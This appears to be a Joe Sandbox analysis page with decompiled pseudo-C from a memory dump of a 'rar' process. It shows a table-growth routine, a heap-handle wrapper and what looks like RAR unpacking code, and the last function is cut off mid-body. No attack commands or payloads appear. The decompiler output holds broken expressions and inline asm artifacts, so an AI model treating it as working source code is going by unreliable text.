                                                                                                            0x7ff650b7033c

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 3215553584-4108050209
                                                                                                            • Opcode ID: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                                            • Instruction ID: 36d3d157290975d59e046c3a6c1bfcfe62ddcdc67519fc869f9d4ff20a8e24f1
                                                                                                            • Opcode Fuzzy Hash: a261a21fa45f21d734edfefcd2ffe271b1157111beaf653bc061adca1a26389c
                                                                                                            • Instruction Fuzzy Hash: E671E522A2C283E6EBA88A1550C427E73909B43744F5C1537ED0BF7BDACE6FE9459701
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B740A4 Relevance: 1.4, Strings: 1, Instructions: 139COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 53%
                                                                                                            			E00007FF67FF650B740A4(void* __eax, signed int __edx, long long __rbx, signed long long*** __rcx, long long __rdi, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t28;
				signed int _t56;
				void* _t68;
				signed long long _t69;
				void* _t74;
				signed int* _t80;
				signed long long _t82;
				signed long long _t84;
				signed long long _t85;
				signed long long _t101;
				signed long long _t102;
				signed long long _t104;
				signed long long _t110;
				signed long long _t112;
				void* _t121;
				signed long long _t124;
				signed long long _t125;
				signed long long _t126;
				signed long long* _t131;
				void* _t132;
				signed long long _t136;
				signed long long*** _t139;

				_t112 = __rsi;
				_t56 = __edx;
				_t68 = _t121;
				 *((long long*)(_t68 + 8)) = __rbx;
				 *((long long*)(_t68 + 0x10)) = __rbp;
				 *((long long*)(_t68 + 0x18)) = __rsi;
				 *((long long*)(_t68 + 0x20)) = __rdi;
				_push(_t132);
				_t69 =  *((intOrPtr*)(__rcx));
				_t139 = __rcx;
				_t80 =  *_t69;
				if (_t80 != 0) goto 0x50b740d9;
				goto 0x50b7425f;
				_t124 =  *0x50b978f0; // 0x27db226282f1
				r12d = 0x40;
				_t117 =  *_t80 ^ _t124;
				asm("dec eax");
				_t82 = _t80[4] ^ _t124;
				asm("dec ecx");
				asm("dec eax");
				if ((_t80[2] ^ _t124) != _t82) goto 0x50b741d9;
				_t84 = _t82 - ( *_t80 ^ _t124) >> 3;
				_t107 =  >  ? _t69 : _t84;
				_t108 = ( >  ? _t69 : _t84) + _t84;
				_t109 =  ==  ? _t69 : ( >  ? _t69 : _t84) + _t84;
				if (( ==  ? _t69 : ( >  ? _t69 : _t84) + _t84) - _t84 < 0) goto 0x50b74158;
				r8d = _t132 - 0x38;
				E00007FF67FF650B798E4(_t132 - 0x20, r8d & 0x0000003f, _t84,  *_t80 ^ _t124,  ==  ? _t69 : ( >  ? _t69 : _t84) + _t84, __rsi, _t117, _t124, _t80[2] ^ _t124);
				_t28 = E00007FF67FF650B7495C(_t69, _t117);
				if (_t69 != 0) goto 0x50b74180;
				_t110 = _t84 + 4;
				r8d = 8;
				E00007FF67FF650B798E4(_t28, 0, _t84, _t117, _t110, _t112, _t117, _t124, _t80[2] ^ _t124);
				_t136 = _t69;
				E00007FF67FF650B7495C(_t69, _t117);
				if (_t136 == 0) goto 0x50b740d1;
				_t125 =  *0x50b978f0; // 0x27db226282f1
				_t131 = _t136 + _t84 * 8;
				_t85 = _t136 + _t110 * 8;
				asm("dec eax");
				_t74 =  >  ? _t112 : _t85 - _t131 + 7 >> 3;
				if (_t74 == 0) goto 0x50b741d9;
				 *_t131 = _t112 ^ _t125;
				if (_t112 + 1 != _t74) goto 0x50b741c3;
				_t126 =  *0x50b978f0; // 0x27db226282f1
				asm("dec eax");
				 *_t131 =  *(_t139[1]) ^ _t126;
				_t101 =  *0x50b978f0; // 0x27db226282f1
				asm("dec eax");
				 *( *( *_t139)) = _t136 ^ _t101;
				_t102 =  *0x50b978f0; // 0x27db226282f1
				asm("dec ecx");
				( *( *_t139))[1] =  &(_t131[1]) ^ _t102;
				_t104 =  *0x50b978f0; // 0x27db226282f1
				r12d = r12d - (_t56 & 0x0000003f);
				asm("dec eax");
				( *( *_t139))[2] = _t85 ^ _t104;
				return 0;
			}

























                                                                                                            0x7ff650b740a4
                                                                                                            0x7ff650b740a4
                                                                                                            0x7ff650b740a4
                                                                                                            0x7ff650b740a7
                                                                                                            0x7ff650b740ab
                                                                                                            0x7ff650b740af
                                                                                                            0x7ff650b740b3
                                                                                                            0x7ff650b740b7
                                                                                                            0x7ff650b740c1
                                                                                                            0x7ff650b740c6
                                                                                                            0x7ff650b740c9
                                                                                                            0x7ff650b740cf
                                                                                                            0x7ff650b740d4
                                                                                                            0x7ff650b740d9
                                                                                                            0x7ff650b740e0
                                                                                                            0x7ff650b740f7
                                                                                                            0x7ff650b740fd
                                                                                                            0x7ff650b74100
                                                                                                            0x7ff650b74103
                                                                                                            0x7ff650b74106
                                                                                                            0x7ff650b7410c
                                                                                                            0x7ff650b7411a
                                                                                                            0x7ff650b74124
                                                                                                            0x7ff650b7412d
                                                                                                            0x7ff650b74130
                                                                                                            0x7ff650b74137
                                                                                                            0x7ff650b74139
                                                                                                            0x7ff650b74144
                                                                                                            0x7ff650b7414e
                                                                                                            0x7ff650b74156
                                                                                                            0x7ff650b74158
                                                                                                            0x7ff650b7415c
                                                                                                            0x7ff650b74168
                                                                                                            0x7ff650b7416f
                                                                                                            0x7ff650b74172
                                                                                                            0x7ff650b7417a
                                                                                                            0x7ff650b74180
                                                                                                            0x7ff650b74187
                                                                                                            0x7ff650b7418e
                                                                                                            0x7ff650b7419d
                                                                                                            0x7ff650b741ba
                                                                                                            0x7ff650b741c1
                                                                                                            0x7ff650b741c6
                                                                                                            0x7ff650b741d0
                                                                                                            0x7ff650b741d2
                                                                                                            0x7ff650b741ee
                                                                                                            0x7ff650b741f8
                                                                                                            0x7ff650b741fb
                                                                                                            0x7ff650b7420e
                                                                                                            0x7ff650b74217
                                                                                                            0x7ff650b7421d
                                                                                                            0x7ff650b7422e
                                                                                                            0x7ff650b74237
                                                                                                            0x7ff650b7423b
                                                                                                            0x7ff650b74247
                                                                                                            0x7ff650b74250
                                                                                                            0x7ff650b7425b
                                                                                                            0x7ff650b7427d

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: @
                                                                                                            • API String ID: 0-2766056989
                                                                                                            • Opcode ID: 6288a14e76810317a5538b49c33242be96f167995058c9a61c14faddcac10df6
                                                                                                            • Instruction ID: ed45ad391f2f9b6296adf951fcbda959e050119f36be24fdd65cea6cffd4641b
                                                                                                            • Opcode Fuzzy Hash: 6288a14e76810317a5538b49c33242be96f167995058c9a61c14faddcac10df6
                                                                                                            • Instruction Fuzzy Hash: 8E41E022724B4A8AEE04DF2AD5981A973A1BB5AFC0B5D9032DE0EE7754DF3DD441C340
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B79990 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00007FF67FF650B79990(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x50bb4430 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}




                                                                                                            0x7ff650b79994
                                                                                                            0x7ff650b7999d
                                                                                                            0x7ff650b799ab

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HeapProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 54951025-0
                                                                                                            • Opcode ID: 91baf107290e5618b62e8d5118d7a74dd45f1ae3fa17f5699a476c6654e643b1
                                                                                                            • Instruction ID: 5d6516566835a4f9859a5fa015b192549155cf5978ab53386d4051d946fd4fe8
                                                                                                            • Opcode Fuzzy Hash: 91baf107290e5618b62e8d5118d7a74dd45f1ae3fa17f5699a476c6654e643b1
                                                                                                            • Instruction Fuzzy Hash: 4DB09220E27A03D3EA482B11ACC621832A47F49B10F884138C80EA1320DF2D60B54701
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B66C10 Relevance: .9, Instructions: 877COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 67%
                                                                                                            			E00007FF67FF650B66C10(void* __edx, void* __edi, void* __ebp, void* __esp, long long __rbx, signed int __rcx, void* __rdx, void* __r10, void* __r11, long long _a8, unsigned int _a16, intOrPtr _a24, signed int _a32) {
				char _v72;
				void* __rsi;
				void* __rbp;
				intOrPtr _t372;
				signed int _t399;
				unsigned int _t532;
				unsigned int _t565;
				signed int _t566;
				void* _t567;
				signed int _t568;
				unsigned int _t569;
				signed int _t578;
				signed char _t584;
				signed int _t585;
				signed int _t586;
				signed int _t594;
				intOrPtr _t597;
				signed int _t604;
				signed int _t608;
				signed int _t622;
				signed int _t643;
				unsigned int _t644;
				void* _t646;
				signed int _t655;
				void* _t666;
				signed int _t668;
				unsigned int _t670;
				signed int _t671;
				signed int _t673;
				signed int _t674;
				unsigned int _t681;
				unsigned int _t682;
				void* _t689;
				void* _t713;
				void* _t725;
				unsigned int _t733;
				void* _t742;
				void* _t749;
				void* _t760;
				signed long long _t773;
				signed long long _t774;
				void* _t776;
				intOrPtr _t777;
				void* _t784;
				intOrPtr _t785;
				signed long long _t790;
				void* _t792;
				intOrPtr _t793;
				signed int _t800;
				intOrPtr _t803;
				signed long long _t807;
				intOrPtr* _t808;
				intOrPtr* _t809;
				intOrPtr* _t810;
				intOrPtr* _t814;
				intOrPtr* _t815;
				intOrPtr* _t816;
				signed long long _t817;
				intOrPtr* _t819;
				intOrPtr* _t820;
				intOrPtr* _t821;
				unsigned long long _t826;
				unsigned long long _t827;
				unsigned long long _t829;
				unsigned long long _t830;
				void* _t835;
				char* _t836;
				long long* _t837;
				signed long long _t838;
				unsigned long long _t841;
				void* _t844;
				char* _t845;
				long long* _t846;
				signed long long _t847;
				void* _t849;
				void* _t850;
				unsigned int _t851;
				void* _t852;
				signed long long _t857;
				intOrPtr* _t859;
				unsigned int _t861;
				unsigned int _t862;
				unsigned long long _t863;
				void* _t872;
				char* _t873;
				long long* _t874;
				signed long long _t875;
				signed int* _t878;
				void* _t883;
				unsigned long long _t884;
				signed long long _t890;
				unsigned long long _t891;
				unsigned int _t899;
				intOrPtr* _t901;
				void* _t902;
				void* _t905;
				unsigned int* _t906;
				unsigned int _t907;

				_t666 = __edi;
				_a8 = __rbx;
				_t906 = __rdx + 8;
				_t849 = __rdx;
				_t800 = __rcx;
				if ( *((char*)(__rdx + 0x38)) != 0) goto 0x50b66c4c;
				 *((char*)(__rdx + 0x38)) = 1;
				_t883 = __rdx + 0x3c;
				if (E00007FF67FF650B61C18(__rcx, _t906, __rdx + 0x24, _t883, __r10) == 0) goto 0x50b66c59;
				_t597 =  *((intOrPtr*)(_t849 + 0x24));
				if ( *_t906 -  *((intOrPtr*)(_t849 + 0x30)) + _t597 <= 0) goto 0x50b66c67;
				 *((char*)(_t849 + 0x4adc)) = 1;
				goto 0x50b6795f;
				r12d = 0x10;
				r9d =  *(_t849 + 0x4ad8);
				_t372 =  *((intOrPtr*)(_t849 + 0x2c)) - 1 + _t597;
				r9d = r9d - r12d;
				_a24 = _t372;
				r10d = r9d;
				_a16 = r9d;
				r10d =  <  ? _t372 : r10d;
				_a32 = r10d;
				goto 0x50b66ca3;
				r9d = _a16;
				_t857 =  *(__rcx + 0xe978);
				_t826 = _t857 &  *(__rcx + 0xd8);
				 *(__rcx + 0xd8) = _t826;
				_t532 =  *_t906;
				if (_t532 - r10d < 0) goto 0x50b66cf7;
				_t689 = _t532 - _t372;
				if (_t689 > 0) goto 0x50b6795d;
				if (_t689 != 0) goto 0x50b66cd9;
				if ( *((intOrPtr*)(_t849 + 0xc)) -  *((intOrPtr*)(_t849 + 0x28)) >= 0) goto 0x50b6795d;
				if (_t532 - r9d < 0) goto 0x50b66ceb;
				if ( *((char*)(_t849 + 0x4ade)) == 0) goto 0x50b67956;
				if (_t532 -  *(_t849 + 0x4ad8) >= 0) goto 0x50b67956;
				_t803 =  *((intOrPtr*)(__rcx + 0x4ba0));
				if ((_t803 - _t826 & _t857) - 0x1004 >= 0) goto 0x50b66d30;
				if (_t803 == _t826) goto 0x50b66d30;
				E00007FF67FF650B63254(_t597, _t666, __ebp, __esp, _t803 - _t826 & _t857, __rcx, _t883, __r10, __r11);
				_t773 =  *((intOrPtr*)(__rcx + 0x4db8));
				if ( *((intOrPtr*)(__rcx + 0x4dc8)) - _t773 > 0) goto 0x50b66c60;
				_t899 =  *_t906;
				_t907 = _t906[4];
				r11d = _t906[1];
				_t604 = ((( *(_t899 + _t907) & 0x000000ff) << 0x00000008 |  *(_t899 + _t907 + 1) & 0x000000ff) << 0x00000008 |  *(_t899 + _t907 + 2) & 0x000000ff) >> 0x00000008 - r11d & 0x0000fffe;
				if (_t604 -  *((intOrPtr*)(_t849 + 0x40 + __rcx * 4)) >= 0) goto 0x50b66da7;
				_t827 = _t826 >> 0;
				r8d =  *(_t827 + _t849 + 0xc4) & 0x000000ff;
				r8d = r8d + r11d;
				r11d = r8d;
				r11d = r11d >> 3;
				r11d = r11d + r10d;
				r8d = r8d & 0x00000007;
				 *_t906 = r11d;
				_t906[1] = r8d;
				goto 0x50b66e16;
				r9d = 0xf;
				if (1 - r9d >= 0) goto 0x50b66dd4;
				r8d = 1;
				_t859 = _t849 + (_t857 + 0x10) * 4;
				if (_t604 -  *_t859 < 0) goto 0x50b66dd1;
				if (2 - r9d < 0) goto 0x50b66dbf;
				goto 0x50b66dd4;
				r9d = 2;
				r8d = __r11 + _t883;
				r11d = r8d;
				r8d = r8d & 0x00000007;
				_t906[1] = r8d;
				r11d = r11d >> 3;
				r11d = r11d + r10d;
				 *_t906 = r11d;
				asm("sbb eax, eax");
				_t608 =  *(_t849 + 0xcc4 + _t773 * 2) & 0xffff;
				if (_t608 - 0x100 >= 0) goto 0x50b66e4d;
				_t774 =  *(__rcx + 0xd8);
				 *( *((intOrPtr*)(__rcx + 0x4ba8)) + _t774) = _t608;
				 *(__rcx + 0xd8) =  *(__rcx + 0xd8) + 1;
				r10d = _a32;
				goto 0x50b66c9e;
				if (_t608 - 0x106 < 0) goto 0x50b673f0;
				r9d = _t827 - 0x106;
				if (r9d - 8 >= 0) goto 0x50b66e6c;
				r9d = r9d + 2;
				goto 0x50b66eda;
				r10d = r9d;
				r9d = r9d & 0x00000003;
				r9d = r9d | 0x00000004;
				r10d = r10d >> 2;
				r10d = r10d - 1;
				r9d = r9d << 0;
				r9d = r9d + 2;
				if (r10d == 0) goto 0x50b66eda;
				r8d = r8d + r10d;
				r11d = r11d + (r8d >> 3);
				r9d = r9d + ((((( *(r11d + _t907) & 0x000000ff) << 0x00000008 |  *(r11d + _t907 + 1) & 0x000000ff) << 0x00000008 |  *(r11d + _t907 + 2) & 0x000000ff) >> 0 & 0x0000ffff) >> 0);
				 *_t906 = r11d;
				r8d = r8d & 0x00000007;
				_t906[1] = r8d;
				_t807 = r11d;
				_t622 = (( *(_t807 + _t907 + 1) & 0x000000ff | ( *(_t807 + _t907) & 0x000000ff) << 0x00000008) << 0x00000008 |  *(_t807 + _t907 + 2) & 0x000000ff) >> 0 & 0x0000fffe;
				if (_t622 -  *((intOrPtr*)(_t849 + 0xf2c + _t807 * 4)) >= 0) goto 0x50b66f48;
				_t668 = ( *((_t827 >> 0) + _t849 + 0xfb0) & 0x000000ff) + r8d;
				 *_t906 = (_t668 >> 3) + r11d;
				_t906[1] = _t668 & 0x00000007;
				goto 0x50b66fbd;
				r13d = 0xf;
				if (1 - r13d >= 0) goto 0x50b66f78;
				r10d = 1;
				_t901 = _t849 + (_t899 + 0x3cb) * 4;
				if (_t622 -  *_t901 < 0) goto 0x50b66f75;
				_t902 = _t901 + 4;
				if (2 - r13d < 0) goto 0x50b66f63;
				goto 0x50b66f78;
				r13d = 2;
				_t670 = _t859 + 4 + _t905;
				_t671 = _t670 & 0x00000007;
				_t906[1] = _t671;
				_t681 = (_t670 >> 3) + r11d;
				 *_t906 = _t681;
				asm("sbb eax, eax");
				_t399 =  *(_t849 + 0x1bb0 + _t774 * 2) & 0xffff;
				r13d = _t681;
				if (_t399 - 4 >= 0) goto 0x50b66fd1;
				r10d = _t774 + 1;
				goto 0x50b671da;
				r11d = _t399;
				r11d = r11d >> 1;
				r11d = r11d - 1;
				r12d = _t774 + 1;
				r10d = r12d;
				if (r11d == 0) goto 0x50b671d4;
				_t713 = r11d - 4;
				if (_t713 < 0) goto 0x50b67170;
				if (_t713 <= 0) goto 0x50b6706e;
				_t861 = _t681;
				r10d =  *(_t861 + _t907 + 4) & 0x000000ff;
				r10d = r10d >> 0 -  *((intOrPtr*)(_t849 + 0xc));
				_t673 = _t671 + 0xfffffffc + r11d;
				r13d = _t673;
				r13d = r13d >> 3;
				r13d = r13d + _t681;
				 *_t906 = r13d;
				r10d = r10d | ((( *(_t861 + _t907 + 1) & 0x000000ff | ( *(_t861 + _t907) & 0x000000ff) << 0x00000008) << 0x00000008 |  *(_t861 + _t907 + 2) & 0x000000ff) << 0x00000008 |  *(_t861 + _t907 + 3) & 0x000000ff) << _t671;
				r10d = r10d >> 0x24 - r11d;
				r10d = r10d << 4;
				r10d = r10d + r12d;
				_t674 = _t673 & 0x00000007;
				_t906[1] = _t674;
				_t829 = r13d;
				r8d =  *(_t829 + _t907 + 1) & 0x000000ff;
				r8d = r8d | ( *(_t829 + _t907) & 0x000000ff) << 0x00000008;
				r8d = r8d << 8;
				r8d = r8d |  *(_t829 + _t907 + 2) & 0x000000ff;
				r8d = r8d >> 8 - _t674;
				r8d = r8d & 0x0000fffe;
				if (r8d -  *((intOrPtr*)(_t849 + 0x1e18 + _t807 * 4)) >= 0) goto 0x50b670e9;
				r12d = 0x10;
				_t830 = _t829 >> 0;
				_t565 = ( *(_t830 + _t849 + 0x1e9c) & 0x000000ff) + _t674;
				_t566 = _t565 & 0x00000007;
				 *_t906 = (_t565 >> 3) + r13d;
				_t906[1] = _t566;
				goto 0x50b67168;
				r11d = 0xf;
				_t567 = _t566 + 1;
				if (_t567 - r11d >= 0) goto 0x50b67118;
				if (r8d -  *((intOrPtr*)(_t849 + (_t830 + 0x786) * 4)) < 0) goto 0x50b67115;
				_t568 = _t567 + 1;
				if (_t568 - r11d < 0) goto 0x50b67103;
				goto 0x50b67118;
				r11d = _t568;
				_t569 = _t850 + __r11;
				r12d = 0x10;
				_t906[1] = _t569 & 0x00000007;
				 *_t906 = (_t569 >> 3) + r13d;
				r8d = r8d -  *((intOrPtr*)(_t849 + 0x1e18 + _t774 * 4));
				r8d = r8d >> 0;
				asm("sbb eax, eax");
				r10d = r10d + ( *(_t849 + 0x2a9c + _t774 * 2) & 0xffff);
				goto 0x50b671da;
				_t862 = _t681;
				r10d =  *(_t862 + _t907 + 4) & 0x000000ff;
				r10d = r10d >> 0 -  *((intOrPtr*)(_t849 + 0xc));
				_t643 = ((( *(_t862 + _t907 + 1) & 0x000000ff | ( *(_t862 + _t907) & 0x000000ff) << 0x00000008) << 0x00000008 |  *(_t862 + _t907 + 2) & 0x000000ff) << 0x00000008 |  *(_t862 + _t907 + 3) & 0x000000ff) << _t674;
				r10d = r10d | _t643;
				r10d = r10d >> 0x20 - r11d;
				_t578 = _t850 + __r11;
				r10d = r10d + r12d;
				 *_t906 = (_t578 >> 3) + _t681;
				_t906[1] = _t578 & 0x00000007;
				r12d = 0x10;
				if (r10d - 0x100 <= 0) goto 0x50b671fe;
				r9d = r9d + 1;
				if (r10d - 0x2000 <= 0) goto 0x50b671fe;
				r9d = r9d + 1;
				if (r10d - 0x40000 <= 0) goto 0x50b671fe;
				r9d = r9d + 1;
				 *(__rcx + 0xc4) =  *(__rcx + 0xc0);
				 *(__rcx + 0xc0) =  *(__rcx + 0xbc);
				 *(__rcx + 0xbc) =  *(__rcx + 0xb8);
				 *(__rcx + 0xb8) = r10d;
				_t863 =  *(__rcx + 0xd8);
				_t835 = _t863 - _t774;
				 *(__rcx + 0xcc) = r9d;
				_t776 =  *((intOrPtr*)(__rcx + 0xe970)) + 0xffffeffc;
				if (_t835 - _t776 >= 0) goto 0x50b67397;
				if (_t863 - _t776 >= 0) goto 0x50b67397;
				_t777 =  *((intOrPtr*)(__rcx + 0x4ba8));
				_t808 = _t777 + _t835;
				_t836 = _t777 + _t863;
				 *(__rcx + 0xd8) = _t777 + _t863;
				if (r9d - 8 < 0) goto 0x50b672e7;
				r8d = r9d;
				_t725 = r10d - r9d;
				if (_t725 >= 0) goto 0x50b672cf;
				r9d = r9d + 0xfffffff8;
				 *_t836 =  *_t808;
				 *((char*)(_t836 + 1)) =  *((intOrPtr*)(_t808 + 1));
				 *((char*)(_t836 + 2)) =  *((intOrPtr*)(_t808 + 2));
				 *((char*)(_t836 + 3)) =  *((intOrPtr*)(_t808 + 3));
				 *((char*)(_t836 + 4)) =  *((intOrPtr*)(_t808 + 4));
				 *((char*)(_t836 + 5)) =  *((intOrPtr*)(_t808 + 5));
				 *((char*)(_t836 + 6)) =  *((intOrPtr*)(_t808 + 6));
				_t809 = _t808 + 8;
				 *((char*)(_t836 + 7)) =  *((intOrPtr*)(_t808 + 7));
				_t837 = _t836 + 8;
				if (_t725 != 0) goto 0x50b6728d;
				goto 0x50b672e7;
				r9d = r9d + 0xfffffff8;
				 *_t837 =  *_t809;
				_t810 = _t809 + 8;
				_t838 = _t837 + 8;
				if (_t725 != 0) goto 0x50b672cf;
				r10d = _a32;
				if (r9d == 0) goto 0x50b66c9e;
				 *_t838 =  *_t810;
				if (r9d - 1 <= 0) goto 0x50b66c9e;
				 *((char*)(_t838 + 1)) =  *((intOrPtr*)(_t810 + 1));
				if (r9d - 2 <= 0) goto 0x50b66c9e;
				 *((char*)(_t838 + 2)) =  *((intOrPtr*)(_t810 + 2));
				if (r9d - 3 <= 0) goto 0x50b66c9e;
				 *((char*)(_t838 + 3)) =  *((intOrPtr*)(_t810 + 3));
				if (r9d - 4 <= 0) goto 0x50b66c9e;
				 *((char*)(_t838 + 4)) =  *((intOrPtr*)(_t810 + 4));
				if (r9d - 5 <= 0) goto 0x50b66c9e;
				r9d = _a16;
				 *((char*)(_t838 + 5)) =  *((intOrPtr*)(_t810 + 5));
				if (r9d - 6 <= 0) goto 0x50b66ca3;
				 *((char*)(_t838 + 6)) =  *((intOrPtr*)(_t810 + 6));
				goto 0x50b6794a;
				r10d = _a32;
				_t733 = r9d;
				if (_t733 == 0) goto 0x50b66c9e;
				 *((char*)((_t863 >> 3) +  *((intOrPtr*)(__rcx + 0x4ba8)))) =  *((intOrPtr*)(( *(__rcx + 0xe978) & _t838) +  *((intOrPtr*)(__rcx + 0x4ba8))));
				 *(__rcx + 0xd8) =  *(__rcx + 0xd8) + 0x00000001 &  *(__rcx + 0xe978);
				r9d = r9d + 0xffffffff;
				if (_t733 != 0) goto 0x50b673b6;
				goto 0x50b67945;
				if (_t643 != 0x100) goto 0x50b6742a;
				_t215 =  &_v72; // 0x30
				if (E00007FF67FF650B60F44(__rcx, __rcx, _t906, _t850, _t852, _t215) == 0) goto 0x50b6795d;
				_t216 =  &_v72; // 0x30
				_t841 = _t216;
				if (E00007FF67FF650B5DC84(_t800, _t800, _t841, _t850) == 0) goto 0x50b6795d;
				goto 0x50b66e39;
				if (_t643 != 0x101) goto 0x50b67606;
				_t644 =  *(_t800 + 0xcc);
				r9d = _a16;
				r10d = _a32;
				if (_t644 == 0) goto 0x50b66ca3;
				_t884 =  *(_t800 + 0xd8);
				r10d =  *(_t800 + 0xb8);
				_t872 = _t884 - _t902;
				_t784 =  *((intOrPtr*)(_t800 + 0xe970)) + 0xffffeffc;
				if (_t872 - _t784 >= 0) goto 0x50b675c6;
				if (_t884 - _t784 >= 0) goto 0x50b675c6;
				_t785 =  *((intOrPtr*)(_t800 + 0x4ba8));
				_t814 = _t785 + _t872;
				_t873 = _t785 + _t884;
				 *(_t800 + 0xd8) = _t884 + _t841;
				if (_t644 - 8 < 0) goto 0x50b67516;
				r9d = _t644;
				_t742 = r10d - _t644;
				if (_t742 >= 0) goto 0x50b674ff;
				 *_t873 =  *_t814;
				 *((char*)(_t873 + 1)) =  *((intOrPtr*)(_t814 + 1));
				 *((char*)(_t873 + 2)) =  *((intOrPtr*)(_t814 + 2));
				 *((char*)(_t873 + 3)) =  *((intOrPtr*)(_t814 + 3));
				 *((char*)(_t873 + 4)) =  *((intOrPtr*)(_t814 + 4));
				 *((char*)(_t873 + 5)) =  *((intOrPtr*)(_t814 + 5));
				 *((char*)(_t873 + 6)) =  *((intOrPtr*)(_t814 + 6));
				_t815 = _t814 + 8;
				 *((char*)(_t873 + 7)) =  *((intOrPtr*)(_t814 + 7));
				_t874 = _t873 + 8;
				if (_t742 != 0) goto 0x50b674b6;
				goto 0x50b67516;
				_t646 = _t644 + 0x1fffffff0;
				 *_t874 =  *_t815;
				_t816 = _t815 + 8;
				_t875 = _t874 + 8;
				if (_t742 != 0) goto 0x50b674ff;
				r9d = _a16;
				r10d = _a32;
				if (_t646 == 0) goto 0x50b66ca3;
				 *_t875 =  *_t816;
